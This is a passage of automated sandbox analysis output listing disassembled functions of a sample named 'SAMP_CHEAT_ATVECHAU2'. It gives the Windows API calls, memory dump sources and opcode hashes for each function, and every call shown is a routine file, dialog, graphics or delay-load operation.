                                                    • Instruction Fuzzy Hash: 63018C70818694EAD725E7B8C0557EDFBA8DF64304F90848DA55A532C2CBB51B08D7B2
                                                    Function 00CFA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CFA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6C4
                                                      • Part of subcall function 00CFA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6F2
                                                      • Part of subcall function 00CFA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6FE
                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CFA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: ee4c6d5e3fd9065840971dd14e2916dec281482dc3193e413d76f7348acb6bce
                                                    • Instruction ID: 1de2337e59709d5a09290adb6a1a1101328a56868ac549a9a497280d2c4ae9fc
                                                    • Opcode Fuzzy Hash: ee4c6d5e3fd9065840971dd14e2916dec281482dc3193e413d76f7348acb6bce
                                                    • Instruction Fuzzy Hash: 1FF08271008794AACBA25BB48905BEBFB906F1A331F048A4AF2FD52196C3755195AB33
                                                    Function 00D00E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00D00E3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExecutionStateThread
                                                    • String ID:
                                                    • API String ID: 2211380416-0
                                                    • Opcode ID: c4ce02d1613b096e50f865d38530e909cb7520dc510438a82498400c8680e920
                                                    • Instruction ID: 9668accd90e4e60855b222ec682b31d2b1a41521338a19e61f870a21e8ae008e
                                                    • Opcode Fuzzy Hash: c4ce02d1613b096e50f865d38530e909cb7520dc510438a82498400c8680e920
                                                    • Instruction Fuzzy Hash: 81D02B0460115966DB253328685A7FE390ACFD7710F0C0025F18DA73C3CF480886B273
                                                    Function 00D0A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00D0A62C
                                                      • Part of subcall function 00D0A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D0A3DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                    • String ID:
                                                    • API String ID: 1915507550-0
                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction ID: 07189710d2c5012e69cadd7e43ae809ec263bbde75b3419720bc8caaaca9aa7b
                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction Fuzzy Hash: F3D0C97121070ABADF426B698C16B6E7AA9EB00340F448526B98AD51D1EAB2D910A672
                                                    Function 00D0E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DloadProtectSection.DELAYIMP ref: 00D0E5E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: DloadProtectSection
                                                    • String ID:
                                                    • API String ID: 2203082970-0
                                                    • Opcode ID: 2f59eec29911e17af4a8c8fe3a1ca6d13eabca20038df2d525978cc338a4c9bd
                                                    • Instruction ID: a6d48e2d7c3be665f7e4be4d1da62d9d283a6a2ffe3a7f78bcf0714a82288652
                                                    • Opcode Fuzzy Hash: 2f59eec29911e17af4a8c8fe3a1ca6d13eabca20038df2d525978cc338a4c9bd
                                                    • Instruction Fuzzy Hash: C0D0C9B81C03409AD61AEBA8AD4AB247364F364706F940E05B94DD17D5DA6684C58635
                                                    Function 00D0DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00D01B3E), ref: 00D0DD92
                                                      • Part of subcall function 00D0B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D0B579
                                                      • Part of subcall function 00D0B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B58A
                                                      • Part of subcall function 00D0B568: IsDialogMessageW.USER32(000103DE,?), ref: 00D0B59E
                                                      • Part of subcall function 00D0B568: TranslateMessage.USER32(?), ref: 00D0B5AC
                                                      • Part of subcall function 00D0B568: DispatchMessageW.USER32(?), ref: 00D0B5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                    • String ID:
                                                    • API String ID: 897784432-0
                                                    • Opcode ID: 14ef247535b3728c06d88ddf2f2559015924d620645127e4dfc92cb7e04e3f6c
                                                    • Instruction ID: 9ee2424bb5b98b125a4d25513f283739d86ea2a0a244fcfad3df97e7a9575f38
                                                    • Opcode Fuzzy Hash: 14ef247535b3728c06d88ddf2f2559015924d620645127e4dfc92cb7e04e3f6c
                                                    • Instruction Fuzzy Hash: 59D09E31148300BAD6022B51CD06F0A7AA2EB88B05F004559B288740F18A729D31EB35
                                                    Function 00CF98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(000000FF,00CF97BE), ref: 00CF98C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 9a924100df74273de106d37783abe6c9974775199312509bc520ab31f99c3cfb
                                                    • Instruction ID: 3bc8822c8dfc9d4401c3a3e4dda0ab5c5249623be925dfdd5032fb4af77a9517
                                                    • Opcode Fuzzy Hash: 9a924100df74273de106d37783abe6c9974775199312509bc520ab31f99c3cfb
                                                    • Instruction Fuzzy Hash: 33C01234400209858E744A2498441A57311EB533E5FB48694C138C51E1C333CD87EA12
                                                    Function 00D0E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 82751d623ef7b3de96072fde4ca821fa1e8ae0d07b9d7d76d910ea381ece99b4
                                                    • Instruction ID: 9892a8ca48798aad4f8642e8d182f4f51aee1b6f69050aac945d62402e93168a
                                                    • Opcode Fuzzy Hash: 82751d623ef7b3de96072fde4ca821fa1e8ae0d07b9d7d76d910ea381ece99b4
                                                    • Instruction Fuzzy Hash: DBB012E666C700BC710451552C02D3B030CC0C1B11330CC3EFC29C08C0D850EC080472
                                                    Function 00D0E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 993c6dd2bd3e51e462e22deb112525fc32674eb99529d8c773a0b1c04f3b5089
                                                    • Instruction ID: 85bf9035f53304e6c1ce10c95e9e3156fa900761d0b0766d11c69eae147cb33a
                                                    • Opcode Fuzzy Hash: 993c6dd2bd3e51e462e22deb112525fc32674eb99529d8c773a0b1c04f3b5089
                                                    • Instruction Fuzzy Hash: F4B012E266D700AC710492152C02E3B030CC0C1B11330C83EFC1DC02C0D850EC0C0872
                                                    Function 00D0E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: d6466870a4e1a93fce07360d59ff1e65f801a6c4e84aaea81141b4b122b60e08
                                                    • Instruction ID: 2a6b0f7c6783626e1cd219073f0cc3a43c25fbdd11910f9b67154d1be8964cfb
                                                    • Opcode Fuzzy Hash: d6466870a4e1a93fce07360d59ff1e65f801a6c4e84aaea81141b4b122b60e08
                                                    • Instruction Fuzzy Hash: 0FB012E666C700AC710491692C02E3B030CC0C0B11330883EFC2DC05C0D850EC080572
                                                    Function 00D0EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0EAF9
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 87d66d4907e69c96ecc51e2706969811905441db77e9ce6eca8786b5b7455d2b
                                                    • Instruction ID: fcce24192272342cc15fa2802661eb4fa63e034f313d8a73159f54826db2cb65
                                                    • Opcode Fuzzy Hash: 87d66d4907e69c96ecc51e2706969811905441db77e9ce6eca8786b5b7455d2b
                                                    • Instruction Fuzzy Hash: 6FB012C73AB652BC750872452D06D3F430DC0D0BD2330D82EFC08C40E1DC804D090471
                                                    Function 00D0E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 16d872897c9fd7037214f4be145951dca0057c39976ee4c934e6cb79b075bcdf
                                                    • Instruction ID: b9aa4667f6cacc3689624cc83bbb71c5548edf96f601d26ea49907b6bb27396a
                                                    • Opcode Fuzzy Hash: 16d872897c9fd7037214f4be145951dca0057c39976ee4c934e6cb79b075bcdf
                                                    • Instruction Fuzzy Hash: 45B012F266C600AC710491162D02E3B038CC0C0B11330883EFC1DC01C0DC50ED090472
                                                    Function 00D0E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 596fa7a734cc2c513a2d56fafcfc459990a81bf283b44a552b982f64c3f6f16d
                                                    • Instruction ID: 022eb26a3589d2c4ffd73055ef17dc67e672da9c69e27de0f5950b326aa3d0c5
                                                    • Opcode Fuzzy Hash: 596fa7a734cc2c513a2d56fafcfc459990a81bf283b44a552b982f64c3f6f16d
                                                    • Instruction Fuzzy Hash: 6AB012F266DB40BC714992152C02E3B030DC0C0B51330893EFC1DC01C0DC50EC4C0472
                                                    Function 00D0E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: c8dce98e9b0b3428001ba05c1c464b4d0b8961ebb240e3d6e5ee6b8829b57a70
                                                    • Instruction ID: d9b7f14fda2a88cf8916986003ff333a14328059f604804918ef5a1ea6486bbe
                                                    • Opcode Fuzzy Hash: c8dce98e9b0b3428001ba05c1c464b4d0b8961ebb240e3d6e5ee6b8829b57a70
                                                    • Instruction Fuzzy Hash: B6B012E266DA40AC710891152C02E3B030DC0C1B51330C83EFC1DC01C0D850EC080472
                                                    Function 00D0E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: a6f671f56acd13e6c00b23df44a2263ab45afb2e2c789247c3252673a587923c
                                                    • Instruction ID: 337f18e4fc81487de3decc85228ef2fa5bf4cabe5d4881e5e64c84bc29bc37f4
                                                    • Opcode Fuzzy Hash: a6f671f56acd13e6c00b23df44a2263ab45afb2e2c789247c3252673a587923c
                                                    • Instruction Fuzzy Hash: C3B012E267DA40AC750891252C02E3B034DC4C0B51330883EFC1EC01C0D850EC080472
                                                    Function 00D0E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
